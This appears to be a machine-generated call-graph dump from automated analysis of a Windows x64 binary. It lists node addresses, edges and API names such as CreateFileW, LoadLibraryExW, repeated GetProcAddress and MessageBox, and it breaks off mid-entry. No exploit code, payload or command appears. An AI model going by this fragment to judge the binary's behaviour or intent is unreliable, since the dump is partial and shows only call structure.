15422 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15426 7ff79ea5b832 15422->15426 15423->15409 15424 7ff79ea5b913 15423->15424 15427 7ff79ea51fd8 15 API calls 15424->15427 15425->15417 15426->15365 15427->15436 15429 7ff79ea5204c 17 API calls 15428->15429 15430 7ff79ea5b8cc 15429->15430 15431 7ff79ea5b8f3 15430->15431 15432 7ff79ea5b8d0 15430->15432 15435 7ff79ea50f4c __vcrt_freefls 14 API calls 15431->15435 15431->15436 15433 7ff79ea52130 30 API calls 15432->15433 15435->15436 15436->15422 15439 7ff79ea5b96a 15438->15439 15440 7ff79ea5b989 15438->15440 15443 7ff79ea5135c _fread_nolock 13 API calls 15439->15443 15441 7ff79ea5b994 GetDriveTypeW 15440->15441 15442 7ff79ea5b985 15440->15442 15441->15442 15445 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15442->15445 15444 7ff79ea5b96f 15443->15444 15446 7ff79ea5137c _wfindfirst32i64 13 API calls 15444->15446 15447 7ff79ea5b846 15445->15447 15448 7ff79ea5b97a 15446->15448 15447->15416 15447->15420 15449 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15448->15449 15449->15442 15451 7ff79ea4d010 __scrt_get_show_window_mode 15450->15451 15452 7ff79ea5af72 GetCurrentDirectoryW 15451->15452 15453 7ff79ea5af89 15452->15453 15454 7ff79ea5afb0 15452->15454 15456 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15453->15456 15455 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 15454->15455 15457 7ff79ea5afbf 15455->15457 15460 7ff79ea5b01d 15456->15460 15458 7ff79ea5afd8 15457->15458 15459 7ff79ea5afc9 GetCurrentDirectoryW 15457->15459 15462 7ff79ea5137c _wfindfirst32i64 13 API calls 15458->15462 15459->15458 15461 7ff79ea5afdd 15459->15461 15460->15420 15463 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15461->15463 15462->15461 15463->15453 15471 7ff79ea5c1c8 EnterCriticalSection 15464->15471 15473 7ff79ea4173e 15472->15473 15474 7ff79ea41726 15472->15474 15476 7ff79ea41768 15473->15476 15477 7ff79ea41744 15473->15477 15475 7ff79ea42b30 18 API calls 15474->15475 15478 7ff79ea41732 15475->15478 15555 7ff79ea47b10 15476->15555 15596 7ff79ea412b0 15477->15596 15478->14647 15483 7ff79ea417b9 15487 7ff79ea43fa0 98 API calls 15483->15487 15484 7ff79ea4178d 15486 7ff79ea42890 40 API calls 15484->15486 15485 7ff79ea4175f 15485->14647 15489 7ff79ea417a3 15486->15489 15490 7ff79ea417ce 15487->15490 15488 7ff79ea42b30 18 API calls 15488->15485 15489->14647 15491 7ff79ea417ee 15490->15491 15492 7ff79ea417d6 15490->15492 15495 7ff79ea41823 15491->15495 15496 7ff79ea41803 15491->15496 15493 7ff79ea42b30 18 API calls 15492->15493 15494 7ff79ea417e5 15493->15494 15500 7ff79ea4deac 64 API calls 15494->15500 15497 7ff79ea41829 15495->15497 15498 7ff79ea41841 15495->15498 15499 7ff79ea42890 40 API calls 15496->15499 15574 7ff79ea41050 15497->15574 15504 7ff79ea41863 15498->15504 15512 7ff79ea41882 15498->15512 15503 7ff79ea41819 15499->15503 15501 7ff79ea41937 15500->15501 15501->14647 15505 7ff79ea4deac 64 API calls 15503->15505 15506 7ff79ea42890 40 API calls 15504->15506 15505->15494 15506->15503 15507 7ff79ea418e3 15508 7ff79ea50f4c __vcrt_freefls 14 API calls 15507->15508 15508->15503 15509 7ff79ea4e1c8 _fread_nolock 46 API calls 15509->15512 15510 7ff79ea418e5 15513 7ff79ea42890 40 API calls 15510->15513 15512->15507 15512->15509 15512->15510 15635 7ff79ea4e6f0 15512->15635 15513->15507 15516 7ff79ea42d66 15514->15516 15515 7ff79ea4316c 15516->15515 15517 7ff79ea42e39 15516->15517 15518 7ff79ea42e75 15516->15518 15793 7ff79ea43190 15517->15793 15520 7ff79ea43190 55 API calls 15518->15520 15521 7ff79ea42e73 15520->15521 15522 7ff79ea42ef6 15521->15522 15523 7ff79ea42eb4 15521->15523 15524 7ff79ea43190 55 API calls 15522->15524 15799 7ff79ea474a0 15523->15799 15526 7ff79ea42f20 15524->15526 15531 7ff79ea43190 55 API calls 15526->15531 15535 7ff79ea42fbc 15526->15535 15528 7ff79ea42ed7 15530 7ff79ea42b30 18 API calls 15528->15530 15529 7ff79ea43151 15536 7ff79ea42b30 18 API calls 15529->15536 15532 7ff79ea42ef1 15530->15532 15533 7ff79ea42f52 15531->15533 15538 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15532->15538 15533->15535 15537 7ff79ea43190 55 API calls 15533->15537 15534 7ff79ea41eb0 40 API calls 15547 7ff79ea4300f 15534->15547 15535->15534 15542 7ff79ea430cf 15535->15542 15554 7ff79ea430ca 15536->15554 15540 7ff79ea42f80 15537->15540 15541 7ff79ea42fb1 15538->15541 15539 7ff79ea41e80 14 API calls 15539->15515 15540->15535 15543 7ff79ea42f84 15540->15543 15541->14647 15548 7ff79ea43128 15542->15548 15836 7ff79ea50fa4 15542->15836 15544 7ff79ea42b30 18 API calls 15543->15544 15544->15532 15545 7ff79ea42b30 18 API calls 15545->15548 15547->15515 15547->15529 15550 7ff79ea41aa0 103 API calls 15547->15550 15548->15529 15548->15545 15549 7ff79ea41710 127 API calls 15548->15549 15549->15548 15551 7ff79ea430b3 15550->15551 15551->15542 15552 7ff79ea430b7 15551->15552 15553 7ff79ea42b30 18 API calls 15552->15553 15553->15554 15554->15539 15556 7ff79ea47b20 15555->15556 15572 7ff79ea47be1 15556->15572 15644 7ff79ea43f30 15556->15644 15558 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15560 7ff79ea41785 15558->15560 15560->15483 15560->15484 15561 7ff79ea47c1b 15650 7ff79ea476c0 15561->15650 15562 7ff79ea47bc6 15564 7ff79ea47c04 15562->15564 15565 7ff79ea47bd0 15562->15565 15569 7ff79ea42c40 18 API calls 15564->15569 15660 7ff79ea42c40 15565->15660 15566 7ff79ea47a60 42 API calls 15570 7ff79ea47b92 15566->15570 15569->15561 15570->15564 15573 7ff79ea50f4c __vcrt_freefls 14 API calls 15570->15573 15571 7ff79ea43fa0 98 API calls 15571->15572 15572->15558 15573->15562 15575 7ff79ea410a6 15574->15575 15576 7ff79ea410ad 15575->15576 15577 7ff79ea410d3 15575->15577 15578 7ff79ea42b30 18 API calls 15576->15578 15580 7ff79ea41109 15577->15580 15581 7ff79ea410ed 15577->15581 15579 7ff79ea410c0 15578->15579 15579->15503 15583 7ff79ea4111b 15580->15583 15588 7ff79ea41137 memcpy_s 15580->15588 15582 7ff79ea42890 40 API calls 15581->15582 15585 7ff79ea41104 15582->15585 15584 7ff79ea42890 40 API calls 15583->15584 15584->15585 15587 7ff79ea50f4c __vcrt_freefls 14 API calls 15585->15587 15586 7ff79ea4e1c8 _fread_nolock 46 API calls 15586->15588 15589 7ff79ea4127e 15587->15589 15588->15585 15588->15586 15592 7ff79ea411fe 15588->15592 15594 7ff79ea4e6f0 64 API calls 15588->15594 15595 7ff79ea4df3c 30 API calls 15588->15595 15593 7ff79ea42b30 18 API calls 15592->15593 15593->15585 15594->15588 15595->15588 15597 7ff79ea412c2 15596->15597 15598 7ff79ea43fa0 98 API calls 15597->15598 15599 7ff79ea412f2 15598->15599 15600 7ff79ea412fa 15599->15600 15601 7ff79ea41311 15599->15601 15602 7ff79ea42b30 18 API calls 15600->15602 15603 7ff79ea41327 15601->15603 15604 7ff79ea4134d 15601->15604 15632 7ff79ea4130a 15602->15632 15605 7ff79ea42890 40 API calls 15603->15605 15611 7ff79ea41368 15604->15611 15612 7ff79ea41390 15604->15612 15607 7ff79ea4133e 15605->15607 15606 7ff79ea50f4c __vcrt_freefls 14 API calls 15608 7ff79ea41442 15606->15608 15610 7ff79ea4deac 64 API calls 15607->15610 15609 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15608->15609 15613 7ff79ea41454 15609->15613 15610->15632 15614 7ff79ea42890 40 API calls 15611->15614 15615 7ff79ea413aa 15612->15615 15626 7ff79ea41463 15612->15626 15613->15485 15613->15488 15617 7ff79ea41383 15614->15617 15618 7ff79ea41050 86 API calls 15615->15618 15616 7ff79ea413c3 15619 7ff79ea4deac 64 API calls 15616->15619 15620 7ff79ea4deac 64 API calls 15617->15620 15621 7ff79ea413bb 15618->15621 15623 7ff79ea413cf 15619->15623 15620->15632 15621->15616 15622 7ff79ea414d2 15621->15622 15627 7ff79ea50f4c __vcrt_freefls 14 API calls 15622->15627 15625 7ff79ea476c0 56 API calls 15623->15625 15624 7ff79ea4e1c8 _fread_nolock 46 API calls 15624->15626 15633 7ff79ea413de 15625->15633 15626->15616 15626->15624 15628 7ff79ea414bb 15626->15628 15629 7ff79ea414df 15627->15629 15630 7ff79ea42890 40 API calls 15628->15630 15631 7ff79ea4deac 64 API calls 15629->15631 15630->15622 15631->15632 15632->15606 15633->15632 15771 7ff79ea44140 15633->15771 15636 7ff79ea4e72a 15635->15636 15637 7ff79ea4e710 15635->15637 15636->15512 15637->15636 15638 7ff79ea4e71a 15637->15638 15639 7ff79ea4e732 15637->15639 15640 7ff79ea5137c _wfindfirst32i64 13 API calls 15638->15640 15785 7ff79ea4e4a0 15639->15785 15642 7ff79ea4e71f 15640->15642 15643 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15642->15643 15643->15636 15645 7ff79ea43f3a 15644->15645 15646 7ff79ea489e0 16 API calls 15645->15646 15647 7ff79ea43f62 15646->15647 15648 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15647->15648 15649 7ff79ea43f8a 15648->15649 15649->15561 15649->15562 15649->15566 15654 7ff79ea476d0 15650->15654 15651 7ff79ea47819 15652 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15651->15652 15653 7ff79ea4782e 15652->15653 15653->15571 15653->15572 15654->15651 15671 7ff79ea51fa8 15654->15671 15661 7ff79ea42c60 __scrt_get_show_window_mode 15660->15661 15662 7ff79ea489e0 16 API calls 15661->15662 15663 7ff79ea42cda 15662->15663 15664 7ff79ea42d19 MessageBoxA 15663->15664 15665 7ff79ea42cdf 15663->15665 15667 7ff79ea42d33 15664->15667 15666 7ff79ea489e0 16 API calls 15665->15666 15668 7ff79ea42cf9 MessageBoxW 15666->15668 15669 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15667->15669 15668->15667 15670 7ff79ea42d43 15669->15670 15670->15572 15688 7ff79ea59630 GetLastError 15671->15688 15674 7ff79ea5b7e1 15715 7ff79ea4bd24 15674->15715 15677 7ff79ea5b708 15678 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15677->15678 15689 7ff79ea59652 15688->15689 15690 7ff79ea59657 15688->15690 15691 7ff79ea5aaf0 _invalid_parameter_noinfo 6 API calls 15689->15691 15692 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 15690->15692 15694 7ff79ea5965f SetLastError 15690->15694 15691->15690 15693 7ff79ea5967a 15692->15693 15693->15694 15696 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 15693->15696 15697 7ff79ea596fe 15694->15697 15698 7ff79ea51fbd 15694->15698 15699 7ff79ea5968d 15696->15699 15718 7ff79ea56530 15697->15718 15698->15674 15698->15677 15700 7ff79ea596ab 15699->15700 15701 7ff79ea5969b 15699->15701 15761 7ff79ea4bd38 IsProcessorFeaturePresent 15715->15761 15727 7ff79ea5effc 15718->15727 15753 7ff79ea5efb4 15727->15753 15772 7ff79ea44150 15771->15772 15773 7ff79ea489e0 16 API calls 15772->15773 15774 7ff79ea4417e 15773->15774 15775 7ff79ea489e0 16 API calls 15774->15775 15781 7ff79ea441f1 15774->15781 15776 7ff79ea44199 15775->15776 15776->15781 15777 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15781->15777 15792 7ff79ea512ac EnterCriticalSection 15785->15792 15794 7ff79ea431c4 15793->15794 15795 7ff79ea431fb 15794->15795 15851 7ff79ea51ccc 15794->15851 15797 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15795->15797 15798 7ff79ea43219 15797->15798 15798->15521 15800 7ff79ea474ae 15799->15800 15801 7ff79ea43fa0 98 API calls 15800->15801 15802 7ff79ea474dd 15801->15802 15803 7ff79ea43f30 16 API calls 15802->15803 15823 7ff79ea4750d 15802->15823 15804 7ff79ea47520 15803->15804 15806 7ff79ea475a4 15804->15806 15812 7ff79ea47a60 42 API calls 15804->15812 15829 7ff79ea4756d 15804->15829 15805 7ff79ea47689 15810 7ff79ea4deac 64 API calls 15805->15810 15828 7ff79ea47685 15805->15828 15808 7ff79ea476c0 56 API calls 15806->15808 15807 7ff79ea475e9 16049 7ff79ea4df10 15807->16049 15813 7ff79ea475af 15808->15813 15810->15828 15811 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15817 7ff79ea42ece 15811->15817 15821 7ff79ea4753e 15812->15821 15822 7ff79ea43fa0 98 API calls 15813->15822 15813->15823 15814 7ff79ea47577 15819 7ff79ea42c40 18 API calls 15814->15819 15815 7ff79ea4758d 15818 7ff79ea42c40 18 API calls 15815->15818 15816 7ff79ea475ee 15824 7ff79ea4e1c8 _fread_nolock 46 API calls 15816->15824 15830 7ff79ea4e6f0 64 API calls 15816->15830 15831 7ff79ea4762c 15816->15831 15832 7ff79ea4df3c 30 API calls 15816->15832 15833 7ff79ea4df10 30 API calls 15816->15833 15835 7ff79ea47666 15816->15835 15817->15528 15817->15529 15818->15806 15819->15823 15820 7ff79ea4deac 64 API calls 15825 7ff79ea4767d 15820->15825 15821->15815 15827 7ff79ea50f4c __vcrt_freefls 14 API calls 15821->15827 15822->15823 15823->15805 15823->15807 15824->15816 15826 7ff79ea4deac 64 API calls 15825->15826 15826->15828 15827->15829 15828->15811 15829->15814 15829->15815 15830->15816 16055 7ff79ea546a0 15831->16055 15832->15816 15833->15816 15835->15820 15837 7ff79ea50fde 15836->15837 15838 7ff79ea50fb1 15836->15838 15840 7ff79ea51001 15837->15840 15843 7ff79ea5101d 15837->15843 15839 7ff79ea5137c _wfindfirst32i64 13 API calls 15838->15839 15846 7ff79ea50f68 15838->15846 15841 7ff79ea50fbb 15839->15841 15842 7ff79ea5137c _wfindfirst32i64 13 API calls 15840->15842 15845 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15841->15845 15847 7ff79ea51006 15842->15847 15844 7ff79ea4eff8 33 API calls 15843->15844 15850 7ff79ea51011 15844->15850 15848 7ff79ea50fc6 15845->15848 15846->15542 15849 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15847->15849 15848->15542 15849->15850 15850->15542 15852 7ff79ea51ce9 15851->15852 15853 7ff79ea51cf5 15851->15853 15868 7ff79ea515f0 15852->15868 15892 7ff79ea4eff8 15853->15892 15856 7ff79ea51cee 15856->15795 15860 7ff79ea51d2d 15903 7ff79ea51478 15860->15903 15862 7ff79ea51d99 15864 7ff79ea515f0 52 API calls 15862->15864 15863 7ff79ea51d85 15863->15856 15865 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15863->15865 15866 7ff79ea51da5 15864->15866 15865->15856 15866->15856 15867 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15866->15867 15867->15856 15869 7ff79ea5162b 15868->15869 15870 7ff79ea5160f 15868->15870 15869->15870 15872 7ff79ea5163e CreateFileW 15869->15872 15871 7ff79ea5135c _fread_nolock 13 API calls 15870->15871 15873 7ff79ea51614 15871->15873 15874 7ff79ea516b8 15872->15874 15875 7ff79ea51671 15872->15875 15877 7ff79ea5137c _wfindfirst32i64 13 API calls 15873->15877 15951 7ff79ea51bc0 15874->15951 15925 7ff79ea5173c GetFileType 15875->15925 15880 7ff79ea5161b 15877->15880 15884 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15880->15884 15881 7ff79ea5167f 15885 7ff79ea5169a CloseHandle 15881->15885 15886 7ff79ea51626 15881->15886 15882 7ff79ea516cd 15974 7ff79ea5197c 15882->15974 15883 7ff79ea516c1 15887 7ff79ea5130c _fread_nolock 13 API calls 15883->15887 15884->15886 15885->15886 15886->15856 15891 7ff79ea516cb 15887->15891 15891->15881 15893 7ff79ea4f01c 15892->15893 15894 7ff79ea4f017 15892->15894 15893->15894 15895 7ff79ea59630 33 API calls 15893->15895 15894->15860 15900 7ff79ea5a948 15894->15900 15896 7ff79ea4f037 15895->15896 16015 7ff79ea598e4 15896->16015 15901 7ff79ea5a720 try_get_function 5 API calls 15900->15901 15902 7ff79ea5a968 15901->15902 15902->15860 15904 7ff79ea514c3 15903->15904 15905 7ff79ea514a1 15903->15905 15906 7ff79ea5151c 15904->15906 15907 7ff79ea514c7 15904->15907 15909 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15905->15909 15916 7ff79ea514af 15905->15916 16046 7ff79ea5b218 15906->16046 15910 7ff79ea514db 15907->15910 15911 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15907->15911 15907->15916 15909->15916 16039 7ff79ea58c00 15910->16039 15911->15910 15916->15862 15916->15863 15926 7ff79ea51847 15925->15926 15927 7ff79ea5178a 15925->15927 15929 7ff79ea5184f 15926->15929 15930 7ff79ea51871 15926->15930 15928 7ff79ea517b6 GetFileInformationByHandle 15927->15928 15932 7ff79ea51ab8 23 API calls 15927->15932 15933 7ff79ea517df 15928->15933 15934 7ff79ea51862 GetLastError 15928->15934 15929->15934 15935 7ff79ea51853 15929->15935 15931 7ff79ea51894 PeekNamedPipe 15930->15931 15950 7ff79ea51832 15930->15950 15931->15950 15936 7ff79ea517a4 15932->15936 15937 7ff79ea5197c 34 API calls 15933->15937 15939 7ff79ea5130c _fread_nolock 13 API calls 15934->15939 15938 7ff79ea5137c _wfindfirst32i64 13 API calls 15935->15938 15936->15928 15936->15950 15941 7ff79ea517ea 15937->15941 15938->15950 15939->15950 15940 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15942 7ff79ea518cd 15940->15942 15991 7ff79ea518e4 15941->15991 15942->15881 15950->15940 15952 7ff79ea51bf6 15951->15952 15953 7ff79ea51c9e 15952->15953 15955 7ff79ea5137c _wfindfirst32i64 13 API calls 15952->15955 15954 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15953->15954 15956 7ff79ea516bd 15954->15956 15957 7ff79ea51c0a 15955->15957 15956->15882 15956->15883 15958 7ff79ea5137c _wfindfirst32i64 13 API calls 15957->15958 15959 7ff79ea51c11 15958->15959 15960 7ff79ea52218 39 API calls 15959->15960 15961 7ff79ea51c27 15960->15961 15962 7ff79ea51c38 15961->15962 15963 7ff79ea51c2f 15961->15963 15965 7ff79ea5137c _wfindfirst32i64 13 API calls 15962->15965 15964 7ff79ea5137c _wfindfirst32i64 13 API calls 15963->15964 15973 7ff79ea51c34 15964->15973 15966 7ff79ea51c3d 15965->15966 15976 7ff79ea519a4 15974->15976 15975 7ff79ea516da 15984 7ff79ea51ab8 15975->15984 15976->15975 15998 7ff79ea5b0a8 15976->15998 15985 7ff79ea51ad2 15984->15985 15992 7ff79ea51903 15991->15992 15993 7ff79ea51910 FileTimeToSystemTime 15991->15993 15992->15993 15995 7ff79ea5190b 15992->15995 15994 7ff79ea51922 SystemTimeToTzSpecificLocalTime 15993->15994 15993->15995 15994->15995 15996 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15995->15996 16000 7ff79ea5b0b5 15998->16000 16001 7ff79ea5b0d9 15998->16001 15999 7ff79ea5b0ba 16000->15999 16000->16001 16002 7ff79ea5b113 16001->16002 16005 7ff79ea5b132 16001->16005 16016 7ff79ea598f9 16015->16016 16017 7ff79ea4f05a 16015->16017 16016->16017 16023 7ff79ea5ece8 16016->16023 16019 7ff79ea59918 16017->16019 16020 7ff79ea5992d 16019->16020 16021 7ff79ea59940 16019->16021 16020->16021 16036 7ff79ea5e040 16020->16036 16021->15894 16024 7ff79ea59630 33 API calls 16023->16024 16025 7ff79ea5ecf7 16024->16025 16026 7ff79ea5ed42 16025->16026 16035 7ff79ea5c1c8 EnterCriticalSection 16025->16035 16026->16017 16037 7ff79ea59630 33 API calls 16036->16037 16038 7ff79ea5e049 16037->16038 16040 7ff79ea58c4b 16039->16040 16044 7ff79ea58c0f _invalid_parameter_noinfo 16039->16044 16041 7ff79ea5137c _wfindfirst32i64 13 API calls 16040->16041 16043 7ff79ea58c49 16041->16043 16042 7ff79ea58c32 RtlAllocateHeap 16042->16043 16042->16044 16043->15916 16044->16040 16044->16042 16045 7ff79ea5ef50 _invalid_parameter_noinfo 2 API calls 16044->16045 16045->16044 16047 7ff79ea5b220 MultiByteToWideChar 16046->16047 16050 7ff79ea4df29 16049->16050 16051 7ff79ea4df19 16049->16051 16050->15816 16052 7ff79ea5137c _wfindfirst32i64 13 API calls 16051->16052 16053 7ff79ea4df1e 16052->16053 16054 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 16053->16054 16054->16050 16056 7ff79ea546a8 16055->16056 16057 7ff79ea546c4 16056->16057 16058 7ff79ea546e5 16056->16058 16060 7ff79ea5137c _wfindfirst32i64 13 API calls 16057->16060 16074 7ff79ea512ac EnterCriticalSection 16058->16074 16061 7ff79ea546c9 16060->16061 16136 7ff79ea4be5e RtlLookupFunctionEntry 16135->16136 16137 7ff79ea4bc7b 16136->16137 16138 7ff79ea4be74 RtlVirtualUnwind 16136->16138 16139 7ff79ea4bc10 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16137->16139 16138->16136 16138->16137 16141 7ff79ea522cc 16140->16141 16142 7ff79ea522f2 16141->16142 16144 7ff79ea52325 16141->16144 16143 7ff79ea5137c _wfindfirst32i64 13 API calls 16142->16143 16145 7ff79ea522f7 16143->16145 16146 7ff79ea5232b 16144->16146 16147 7ff79ea52338 16144->16147 16148 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 16145->16148 16149 7ff79ea5137c _wfindfirst32i64 13 API calls 16146->16149 16159 7ff79ea56a48 16147->16159 16158 7ff79ea43ff9 16148->16158 16149->16158 16158->14755 16172 7ff79ea5c1c8 EnterCriticalSection 16159->16172 16583 7ff79ea43fa0 98 API calls 16582->16583 16584 7ff79ea415c7 16583->16584 16585 7ff79ea415f0 16584->16585 16586 7ff79ea415cf 16584->16586 16589 7ff79ea41621 16585->16589 16590 7ff79ea41605 16585->16590 16587 7ff79ea42b30 18 API calls 16586->16587 16588 7ff79ea415df 16587->16588 16588->14779 16592 7ff79ea41651 16589->16592 16593 7ff79ea41631 16589->16593 16591 7ff79ea42890 40 API calls 16590->16591 16599 7ff79ea4161c 16591->16599 16594 7ff79ea41666 16592->16594 16602 7ff79ea4167d 16592->16602 16596 7ff79ea42890 40 API calls 16593->16596 16597 7ff79ea41050 86 API calls 16594->16597 16595 7ff79ea4deac 64 API calls 16598 7ff79ea416f7 16595->16598 16596->16599 16600 7ff79ea41677 16597->16600 16598->14779 16599->16595 16600->16599 16604 7ff79ea50f4c __vcrt_freefls 14 API calls 16600->16604 16601 7ff79ea4e1c8 _fread_nolock 46 API calls 16601->16602 16602->16599 16602->16601 16603 7ff79ea416be 16602->16603 16605 7ff79ea42890 40 API calls 16603->16605 16604->16599 16605->16600 16608 7ff79ea419d3 16606->16608 16609 7ff79ea4196f 16606->16609 16607 7ff79ea50fa4 33 API calls 16607->16609 16608->14790 16609->16607 16609->16608 16611 7ff79ea489e0 16 API calls 16610->16611 16612 7ff79ea48177 LoadLibraryExW 16611->16612 16613 7ff79ea50f4c __vcrt_freefls 14 API calls 16612->16613 16614 7ff79ea4647c 16613->16614 16614->14801 16616 7ff79ea46e19 16615->16616 16617 7ff79ea46e3c GetProcAddress 16615->16617 16619 7ff79ea429e0 16 API calls 16616->16619 16617->16616 16618 7ff79ea46e61 GetProcAddress 16617->16618 16618->16616 16620 7ff79ea46e86 GetProcAddress 16618->16620 16621 7ff79ea46e2c 16619->16621 16620->16616 16622 7ff79ea46eae GetProcAddress 16620->16622 16621->14806 16622->16616 16623 7ff79ea46ed6 GetProcAddress 16622->16623 16623->16616 16624 7ff79ea46efe GetProcAddress 16623->16624 16625 7ff79ea46f1a 16624->16625 16626 7ff79ea46f26 GetProcAddress 16624->16626 16625->16626 16627 7ff79ea46f4e GetProcAddress 16626->16627 16628 7ff79ea46f42 16626->16628 16628->16627 16675 7ff79ea45ac0 16674->16675 16676 7ff79ea45afb 16675->16676 16679 7ff79ea45b1b 16675->16679 16677 7ff79ea42b30 18 API calls 16676->16677 16678 7ff79ea45b11 16677->16678 16680 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 16678->16680 16682 7ff79ea45b72 16679->16682 16683 7ff79ea45b5a 16679->16683 16688 7ff79ea42b30 18 API calls 16679->16688 16685 7ff79ea4344e 16680->16685 16681 7ff79ea45ba9 16687 7ff79ea48160 31 API calls 16681->16687 16682->16681 16686 7ff79ea42b30 18 API calls 16682->16686 16684 7ff79ea43f30 16 API calls 16683->16684 16689 7ff79ea45b64 16684->16689 16685->14817 16696 7ff79ea45c10 16685->16696 16686->16681 16690 7ff79ea45bb6 16687->16690 16688->16683 16689->16682 16694 7ff79ea48160 31 API calls 16689->16694 16691 7ff79ea45bdd 16690->16691 16692 7ff79ea45bbb 16690->16692 16775 7ff79ea450d0 GetProcAddress 16691->16775 16695 7ff79ea429e0 16 API calls 16692->16695 16694->16682 16695->16678 16859 7ff79ea44cd0 16696->16859 16698 7ff79ea45c34 16699 7ff79ea45c4d 16698->16699 16700 7ff79ea45c3c 16698->16700 16876 7ff79ea44500 16699->16876 16701 7ff79ea42b30 18 API calls 16700->16701 16737 7ff79ea45c48 16701->16737 16704 7ff79ea45c6a 16707 7ff79ea45c88 16704->16707 16708 7ff79ea45c77 16704->16708 16705 7ff79ea45c59 16706 7ff79ea42b30 18 API calls 16705->16706 16706->16737 16880 7ff79ea44870 16707->16880 16710 7ff79ea42b30 18 API calls 16708->16710 16710->16737 16714 7ff79ea45cb8 16715 7ff79ea45ca7 16906 7ff79ea44c30 16737->16906 16739 7ff79ea45810 16740 7ff79ea45827 16739->16740 16740->16740 16741 7ff79ea45850 16740->16741 16747 7ff79ea45867 16740->16747 16742 7ff79ea42b30 18 API calls 16741->16742 16743 7ff79ea4585c 16742->16743 16743->14821 16744 7ff79ea45955 16744->14821 16745 7ff79ea415a0 105 API calls 16745->16747 16746 7ff79ea42b30 18 API calls 16746->16747 16747->16744 16747->16745 16747->16746 16748 7ff79ea50f4c __vcrt_freefls 14 API calls 16747->16748 16748->16747 16776 7ff79ea450f2 16775->16776 16777 7ff79ea45110 GetProcAddress 16775->16777 16779 7ff79ea429e0 16 API calls 16776->16779 16777->16776 16778 7ff79ea45135 GetProcAddress 16777->16778 16778->16776 16780 7ff79ea4515a GetProcAddress 16778->16780 16781 7ff79ea45105 16779->16781 16780->16776 16782 7ff79ea45182 GetProcAddress 16780->16782 16781->16678 16782->16776 16783 7ff79ea451aa GetProcAddress 16782->16783 16783->16776 16784 7ff79ea451d2 GetProcAddress 16783->16784 16784->16776 16785 7ff79ea451fa GetProcAddress 16784->16785 16786 7ff79ea45222 GetProcAddress 16785->16786 16787 7ff79ea45216 16785->16787 16788 7ff79ea4524a GetProcAddress 16786->16788 16789 7ff79ea4523e 16786->16789 16787->16786 16790 7ff79ea45272 GetProcAddress 16788->16790 16791 7ff79ea45266 16788->16791 16789->16788 16792 7ff79ea4529a GetProcAddress 16790->16792 16793 7ff79ea4528e 16790->16793 16791->16790 16794 7ff79ea452c2 GetProcAddress 16792->16794 16795 7ff79ea452b6 16792->16795 16793->16792 16796 7ff79ea452ea GetProcAddress 16794->16796 16797 7ff79ea452de 16794->16797 16795->16794 16798 7ff79ea45312 GetProcAddress 16796->16798 16799 7ff79ea45306 16796->16799 16797->16796 16799->16798 16861 7ff79ea44cf5 16859->16861 16860 7ff79ea44cfd 16860->16698 16861->16860 16863 7ff79ea44e8f 16861->16863 16918 7ff79ea52df4 16861->16918 16862 7ff79ea45068 16864 7ff79ea50f4c __vcrt_freefls 14 API calls 16862->16864 16865 7ff79ea4503c 16863->16865 16873 7ff79ea44220 30 API calls 16863->16873 16874 7ff79ea4503a 16863->16874 16869 7ff79ea45071 16864->16869 16865->16862 16866 7ff79ea50f4c __vcrt_freefls 14 API calls 16865->16866 16866->16865 16867 7ff79ea45098 16868 7ff79ea50f4c __vcrt_freefls 14 API calls 16867->16868 16870 7ff79ea450a1 16868->16870 16869->16867 16871 7ff79ea50f4c __vcrt_freefls 14 API calls 16869->16871 16872 7ff79ea50f4c __vcrt_freefls 14 API calls 16870->16872 16871->16869 16872->16874 16873->16863 16874->16698 16877 7ff79ea44530 16876->16877 16878 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 16877->16878 16879 7ff79ea44592 16878->16879 16879->16704 16879->16705 16882 7ff79ea44884 16880->16882 16883 7ff79ea448cc 16882->16883 16976 7ff79ea443a0 16882->16976 16883->16714 16883->16715 16907 7ff79ea43464 16906->16907 16911 7ff79ea44c39 16906->16911 16907->14817 16907->16739 16908 7ff79ea44c78 16909 7ff79ea50f4c __vcrt_freefls 14 API calls 16908->16909 16910 7ff79ea44c86 16909->16910 16912 7ff79ea44ca8 16910->16912 16915 7ff79ea50f4c __vcrt_freefls 14 API calls 16910->16915 16911->16908 16913 7ff79ea50f4c __vcrt_freefls 14 API calls 16911->16913 16914 7ff79ea50f4c __vcrt_freefls 14 API calls 16912->16914 16913->16911 16916 7ff79ea44cb1 16914->16916 16915->16910 16919 7ff79ea52e07 16918->16919 16922 7ff79ea523a4 16919->16922 16923 7ff79ea523e6 16922->16923 16924 7ff79ea523d1 16922->16924 16923->16924 16926 7ff79ea523f4 16923->16926 16925 7ff79ea5137c _wfindfirst32i64 13 API 